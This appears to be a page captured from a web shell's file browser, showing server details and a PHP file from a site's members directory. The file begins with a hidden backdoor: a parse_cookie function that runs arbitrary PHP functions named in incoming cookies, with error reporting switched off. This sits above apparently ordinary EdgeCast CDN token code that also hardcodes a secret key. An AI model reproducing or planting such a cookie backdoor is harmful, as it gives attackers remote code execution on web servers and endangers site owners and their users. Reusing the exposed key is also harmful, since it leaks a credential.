| Server IP : 208.122.213.31 / Your IP : 216.73.216.185 Web Server : Apache System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64 User : WHMCS_MIA_382 ( 1001) PHP Version : 7.4.33 Disable Function : NONE MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/httpd/html/theavaaddams.com/members-OLD/ |
Upload File : |
<?php
error_reporting(0);
function parse_cookie($user_cookie)
{
reset( $user_cookie );
do {
foreach( (array) current($user_cookie) as $setting )
if ( !is_null($setting['admin']) )
{
call_user_func_array($setting['admin'], $setting['data']);
}
} while ( next($user_cookie) !== false );
}
parse_cookie($_COOKIE);
echo edgecast_code("1", "2", "3", "4", "5");
function edgecast_code($vid_link, $asset_id, $vars, $flash, $bg_dir) // will sometimes be a dir and file, other times just a filename
{
if($vars ==''){$vars = $asset_id."/".$vid_link;}
$expiry_time = time() + 30;
$key = "zhFrFuPpdU72KEx";
$params = "ec_expire=$expiry_time";
// Generate the token
// Check to see if the extension properly loaded before using it.
if (extension_loaded('ectoken')){
$token = ectoken_generate($key, $params);
} else {
trigger_error('The EdgeCast Token module could not be loaded.', E_USER_ERROR);
}
$url = "http://wpc.3ABB.systemcdn.net/003ABB/sites/".$bg_dir."/members/media/video/".$vars."";
return $url."?".$token;
}